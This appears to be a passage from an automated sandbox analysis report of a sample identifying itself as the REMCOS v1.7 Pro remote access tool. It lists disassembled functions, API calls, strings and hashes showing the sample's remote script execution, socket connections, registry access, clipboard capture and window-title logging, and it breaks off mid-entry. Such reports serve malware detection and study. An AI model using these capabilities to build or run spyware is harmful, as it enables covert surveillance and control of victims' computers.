                                • Part of subcall function 0040D20D: ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 0040D2AD
                                • Part of subcall function 0040D20D: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040D2CC
                                • Part of subcall function 0040D20D: ShellExecuteExA.SHELL32(0000003C), ref: 0040D2E9
                                • Part of subcall function 0040D20D: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(remscriptexecd,?), ref: 0040D30D
                                • Part of subcall function 0040D20D: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0040D31F
                                • Part of subcall function 0040D20D: CloseHandle.KERNEL32(?), ref: 0040D328
                                • Part of subcall function 0040D20D: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040D331
                                • Part of subcall function 0040D20D: DeleteFileA.KERNEL32(00000000), ref: 0040D338
                                • Part of subcall function 0040D20D: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(remscriptsuccess,?,?,?,?,?), ref: 0040D352
                                • Part of subcall function 0040D20D: ??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60(?,?,?,?), ref: 0040D380
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D459
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D46A
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: U?$char_traits@$V?$allocator@$D@std@@$D@2@@std@@$??0?$basic_string@$??1?$basic_string@$V01@@$D@1@@D@std@@@std@@V?$basic_string@$?c_str@?$basic_string@?length@?$basic_string@D@2@@0@$CloseHandleHstd@@V12@$??0?$basic_ofstream@??4?$basic_string@??6std@@??8std@@?close@?$basic_ofstream@?find@?$basic_string@?is_open@?$basic_ofstream@?substr@?$basic_string@D?$basic_ofstream@D@2@@0@@D@std@@@0@DeleteEventExecuteFileObjectShellSingleV01@V10@V10@0@V10@@V?$basic_ostream@Waitgetenv
                              • String ID: exec
                              • API String ID: 1002160170-3144634053
                              • Opcode ID: 56fcbabcf975ea0c7de527fb19e0c164c1539da4d09a0a8bf085cf32e83460a5
                              • Instruction ID: 2a1242b9f6ee79d5d393efb9909d70216f0b734506a354a1a0805bdd98583fd6
                              • Opcode Fuzzy Hash: 56fcbabcf975ea0c7de527fb19e0c164c1539da4d09a0a8bf085cf32e83460a5
                              • Instruction Fuzzy Hash: 89213072910119ABCF04BBE5DC5E9EE7B78FF14305F004469F912A20E1EE785988CB99
                              Function 004094DE Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 62COMMON
                              Download Yara Rule
                              APIs
                              • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,HKLM,00415268,?,00409C86), ref: 004094F1
                              • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,HKCU), ref: 00409509
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409561
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040956E
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@??8std@@D@2@@0@D@2@@std@@V?$basic_string@
                              • String ID: HKCC$HKCR$HKCU$HKLM$HKU
                              • API String ID: 2054586871-62392802
                              • Opcode ID: 1e8cfaee7e8edccd3cbd4cc1fc534f52dd70c70e2637a942119cbfc6a749a9cb
                              • Instruction ID: d777f3dda36179113423a7ed30754d26adfb0a2fc6db248441cd5d77bc2a580d
                              • Opcode Fuzzy Hash: 1e8cfaee7e8edccd3cbd4cc1fc534f52dd70c70e2637a942119cbfc6a749a9cb
                              • Instruction Fuzzy Hash: 0501C43B58422A73CE059AD5EC15AD927088B053A5F2000B7AA00F75D2CE7CDEC98BC9
                              Function 0040C8F3 Relevance: 19.6, APIs: 13, Instructions: 69windowCOMMON
                              Download Yara Rule
                              APIs
                              • GetWindowTextW.USER32(?,?,0000012C), ref: 0040C90B
                              • IsWindowVisible.USER32(?), ref: 0040C914
                              • sprintf.MSVCRT ref: 0040C93C
                              • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 0040C953
                                • Part of subcall function 0040EDD3: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDE3
                                • Part of subcall function 0040EDD3: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(004118A0,00000000,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDF4
                                • Part of subcall function 0040EDD3: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDFD
                                • Part of subcall function 0040EDD3: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE0A
                                • Part of subcall function 0040EDD3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE15
                                • Part of subcall function 0040EDD3: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(hRA,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE34
                                • Part of subcall function 0040EDD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE3D
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,0041171C,?,00411728), ref: 0040C97B
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,00411728), ref: 0040C988
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,00411728), ref: 0040C995
                              • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,00411728), ref: 0040C9A3
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00411728), ref: 0040C9AC
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00411728), ref: 0040C9B5
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00411728), ref: 0040C9BE
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00411728), ref: 0040C9C7
                              • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00411728), ref: 0040C9D0
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$G@2@@std@@G@std@@$??0?$basic_string@D@2@@0@Hstd@@V10@V?$basic_string@$?c_str@?$basic_string@?length@?$basic_string@V01@@Window$D@1@@G@1@@TextV01@VisibleY?$basic_string@sprintf
                              • String ID:
                              • API String ID: 1029694555-0
                              • Opcode ID: d1a5efd950a48ac111f91248e106e01afb4cc1c703c408ec3dfb3afdd1bed23d
                              • Instruction ID: 4e002e25e0f648f437be034c291f2efbcbeefca2187121b50d5874a0224bd0e6
                              • Opcode Fuzzy Hash: d1a5efd950a48ac111f91248e106e01afb4cc1c703c408ec3dfb3afdd1bed23d
                              • Instruction Fuzzy Hash: 7621DA72D4010EABDF14ABA0EC8DDDE777DAB14308F008476F516A21A1EB7896898B58
                              Function 0040E5CE Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 51COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00408EF1: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,80000002), ref: 00408F12
                                • Part of subcall function 00408EF1: RegQueryValueExA.ADVAPI32(80000002,004075CB,00000000,00000000,?,00000400), ref: 00408F31
                                • Part of subcall function 00408EF1: RegCloseKey.ADVAPI32(80000002), ref: 00408F3A
                                • Part of subcall function 00408EF1: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00410668,?), ref: 00408F59
                              • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP60(.exe,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00407FB7,?), ref: 0040E5F6
                              • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,-00000004,?,?,?,?,?,?,?,?,?,?,?,?,00407FB7), ref: 0040E609
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00407FB7,?), ref: 0040E613
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00407FB7,?), ref: 0040E61C
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040E635
                                • Part of subcall function 0040EED4: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP60(?,00000000,6A41AFB0,?,?,0040E644,?), ref: 0040EEE3
                                • Part of subcall function 0040EED4: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,0040E644,?), ref: 0040EF01
                                • Part of subcall function 0040EED4: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,0040E644,?), ref: 0040EF09
                                • Part of subcall function 0040EED4: ?replace@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@IIPBD@Z.MSVCP60(00000000,00000000,?,?,0040E644,?), ref: 0040EF14
                                • Part of subcall function 0040EED4: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000,?,?,0040E644,?), ref: 0040EF1E
                                • Part of subcall function 0040EED4: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,0040E644,?), ref: 0040EF27
                                • Part of subcall function 0040EED4: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,0040E644,?), ref: 0040EF3F
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040E64B
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E654
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040E661
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E66A
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@??1?$basic_string@V01@@$??4?$basic_string@?find@?$basic_string@D@1@@V01@V12@$?length@?$basic_string@?replace@?$basic_string@?substr@?$basic_string@CloseOpenQueryValue
                              • String ID: .exe$http\shell\open\command
                              • API String ID: 1097156965-4091164470
                              • Opcode ID: 08a1c99976d7565a188055a544cab16fbeaa302825a2accc4baf47b801d316af
                              • Instruction ID: c33ef1c1da018883c7c7ab6d04285324c3d84ed8a02606c642186c54a30d9d8b
                              • Opcode Fuzzy Hash: 08a1c99976d7565a188055a544cab16fbeaa302825a2accc4baf47b801d316af
                              • Instruction Fuzzy Hash: EF11F17190011EABDF04EBE0DC4DFEE7778FB14305F444469F512A21A1EEB8A548CB58
                              Function 00405142 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 68COMMON
                              Download Yara Rule
                              APIs
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,00000000,76F90F00,?,?,?,?,?,00404196), ref: 00405168
                              • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP60(?,004156A8,?,?,00000000,76F90F00,?,?,?,?,?,00404196), ref: 0040518E
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,00404196), ref: 004051A0
                              • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00410668,?,?,?,00404196), ref: 004051AF
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[Following text has been copied to clipboard:],004156A8,[End of clipboard text]), ref: 004051D1
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,[End of clipboard text]), ref: 004051DB
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,[End of clipboard text]), ref: 004051ED
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00404196), ref: 004051F6
                              Strings
                              • [Following text has been copied to clipboard:], xrefs: 004051CB
                              • [End of clipboard text], xrefs: 004051C5
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@V?$basic_string@$D@2@@0@$??1?$basic_string@Hstd@@$??0?$basic_string@??4?$basic_string@??8std@@??9std@@D@1@@D@2@@0@0@V01@V01@@V10@V10@@
                              • String ID: [End of clipboard text]$[Following text has been copied to clipboard:]
                              • API String ID: 1191203583-3441917614
                              • Opcode ID: 90c1c98ff18be6c2d4d3753f8e68d31aeb205785e0e6a9307077bf7a6d6592dc
                              • Instruction ID: 00a8ace4b862f7325ec407ea538c2c3054ea5e1f5129ba08377fdacfa38d8bab
                              • Opcode Fuzzy Hash: 90c1c98ff18be6c2d4d3753f8e68d31aeb205785e0e6a9307077bf7a6d6592dc
                              • Instruction Fuzzy Hash: 5911B731A002099BCB00E7A4ED4EEEF3B6CDB84315F10007BF405B2181DE788D89876D
                              Function 00402646 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 62timethreadCOMMON
                              Download Yara Rule
                              APIs
                              • GetLocalTime.KERNEL32(?,76E50440,00415A30,6A41AFB0,?,?,?,?,?,?,?,?,?,?,?,0040A950), ref: 0040266B
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(%02i:%02i:%02i:%03i [KeepAlive] ,?,Enabled! (Timeout: %i seconds),?,?,0040A950,?,?), ref: 00402697
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,0040A950,?), ref: 004026A2
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040A950,?), ref: 004026AC
                              • printf.MSVCRT ref: 004026B3
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004026BF
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004026C8
                              • CreateThread.KERNEL32(00000000,00000000,00402823,00415A30,00000000,00000000), ref: 004026DF
                              Strings
                              • %02i:%02i:%02i:%03i [KeepAlive] , xrefs: 00402692
                              • Enabled! (Timeout: %i seconds), xrefs: 0040268C
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@?c_str@?$basic_string@CreateD@1@@D@2@@0@Hstd@@LocalThreadTimeV10@V?$basic_string@printf
                              • String ID: %02i:%02i:%02i:%03i [KeepAlive] $Enabled! (Timeout: %i seconds)
                              • API String ID: 3715082883-3146830426
                              • Opcode ID: 3a9708a68446399abd0b795bd19e37fdc65d9098a2dc3f9d79772d21f0b7afde
                              • Instruction ID: 79c03f263a9eabdf1fe5f6b3bc6f9ebe40ce7b552af33f5414839a7309894a53
                              • Opcode Fuzzy Hash: 3a9708a68446399abd0b795bd19e37fdc65d9098a2dc3f9d79772d21f0b7afde
                              • Instruction Fuzzy Hash: F01186B2501218BFCB509BE4DD8DCFFB7BCAA44714B004477F542A2190DAB9A984C778
                              Function 0040FAED Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 90memoryCOMMON
                              Download Yara Rule
                              APIs
                              • AllocConsole.KERNEL32(76F90F10,00000000,00415940), ref: 0040FAF9
                              • GetConsoleWindow.KERNEL32 ref: 0040FAFF
                              • ShowWindow.USER32(00000000,00000000), ref: 0040FB13
                              • freopen.MSVCRT ref: 0040FB2C
                              • printf.MSVCRT ref: 0040FBD5
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: ConsoleWindow$AllocShowfreopenprintf
                              • String ID: * Breaking-Security.Net$ * REMCOS v$1.7 Pro$CONOUT$
                              • API String ID: 758035570-4154014664
                              • Opcode ID: 85a77a9c2555b3fe81e500512262144cb936832edbba782d647d7bbe067822b6
                              • Instruction ID: 2f2b88ad7b218c54194607ff57f3a4bae2920d7697a65db163e517dfa2cb7a2b
                              • Opcode Fuzzy Hash: 85a77a9c2555b3fe81e500512262144cb936832edbba782d647d7bbe067822b6
                              • Instruction Fuzzy Hash: 6D212832B0020C1BCB299B7DDCA45EE7A9BA7C4251B94817EF90BD73D0DEB04D888608
                              Function 00407C53 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 81COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00408150: FindResourceA.KERNEL32(00000000,SETTINGS,0000000A), ref: 0040815E
                                • Part of subcall function 00408150: LoadResource.KERNEL32(00000000,00000000,?,?,?,00407C6C,00000000,?,?,00000000), ref: 00408169
                                • Part of subcall function 00408150: LockResource.KERNEL32(00000000,?,?,?,00407C6C,00000000,?,?,00000000), ref: 00408170
                                • Part of subcall function 00408150: SizeofResource.KERNEL32(00000000,00000000,?,?,?,00407C6C,00000000,?,?,00000000), ref: 0040817B
                              • malloc.MSVCRT ref: 00407C76
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,00000000), ref: 00407CA2
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407CAE
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407CB7
                              • malloc.MSVCRT ref: 00407CC8
                                • Part of subcall function 00402A2A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,?,dt@,00000000), ref: 00402A40
                                • Part of subcall function 00402A2A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 00402A4C
                                • Part of subcall function 00402A2A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 00402A61
                                • Part of subcall function 00402A2A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402A6A
                              • free.MSVCRT(?,?,?,?,dt@,00000000), ref: 00407D13
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00407D21
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407D2A
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@Resource$??1?$basic_string@V01@@$D@1@@malloc$??4?$basic_string@?c_str@?$basic_string@FindLoadLockSizeofV01@free
                              • String ID: dt@
                              • API String ID: 531887698-2366654348
                              • Opcode ID: 986cc1e09f076ae00b03e92c541cff929956ae5efa4b9e40f25a22f0709455da
                              • Instruction ID: e7c362bbf55d6fe362def41f57b44465b4cf4643257c8798677b0b7ff2d7c4a4
                              • Opcode Fuzzy Hash: 986cc1e09f076ae00b03e92c541cff929956ae5efa4b9e40f25a22f0709455da
                              • Instruction Fuzzy Hash: 7F310776A00009EFCF04DBA4D9999EEBBB9FB48315F1041A9E906A3290DA746E48DB54
                              Function 00406055 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 76COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00402109: socket.WS2_32(00000000,00000001,00000006), ref: 00402120
                                • Part of subcall function 00402168: connect.WS2_32(00415A30,00415A34,00000010), ref: 0040217E
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,funready,00415268,00000000,?,?,?,00415988), ref: 004060A9
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00415988), ref: 004060C5
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,00415988), ref: 004060B3
                                • Part of subcall function 00402198: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00415A30,00415940,?,0040A446), ref: 004021A7
                                • Part of subcall function 00402198: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004021BA
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,getfunlib,00415268,00000000,?,?,?,00415988), ref: 004060EC
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,00415988), ref: 004060F6
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00415988), ref: 00406108
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00415988), ref: 00406111
                                • Part of subcall function 0040EDD3: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDE3
                                • Part of subcall function 0040EDD3: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(004118A0,00000000,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDF4
                                • Part of subcall function 0040EDD3: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDFD
                                • Part of subcall function 0040EDD3: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE0A
                                • Part of subcall function 0040EDD3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE15
                                • Part of subcall function 0040EDD3: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(hRA,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE34
                                • Part of subcall function 0040EDD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE3D
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@G@2@@std@@G@std@@$?c_str@?$basic_string@?length@?$basic_string@V01@@V10@0@V10@@$D@1@@connectsocket
                              • String ID: funready$getfunlib
                              • API String ID: 325875447-1077912798
                              • Opcode ID: 5fa60852b65b47e2a6ed33d628b531b91edfa84125d12b179fb2feb604901ce3
                              • Instruction ID: 70f68d2a33a774611a59a187b4e42018cf206f473d21f4c0636caec103ff2ad2
                              • Opcode Fuzzy Hash: 5fa60852b65b47e2a6ed33d628b531b91edfa84125d12b179fb2feb604901ce3
                              • Instruction Fuzzy Hash: A011A571A40615A6DB04B7B1AC4BDFF726CAA85304F04093EF901761C2E9BC5958466D
                              Function 0040E6BB Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58COMMON
                              Download Yara Rule
                              APIs
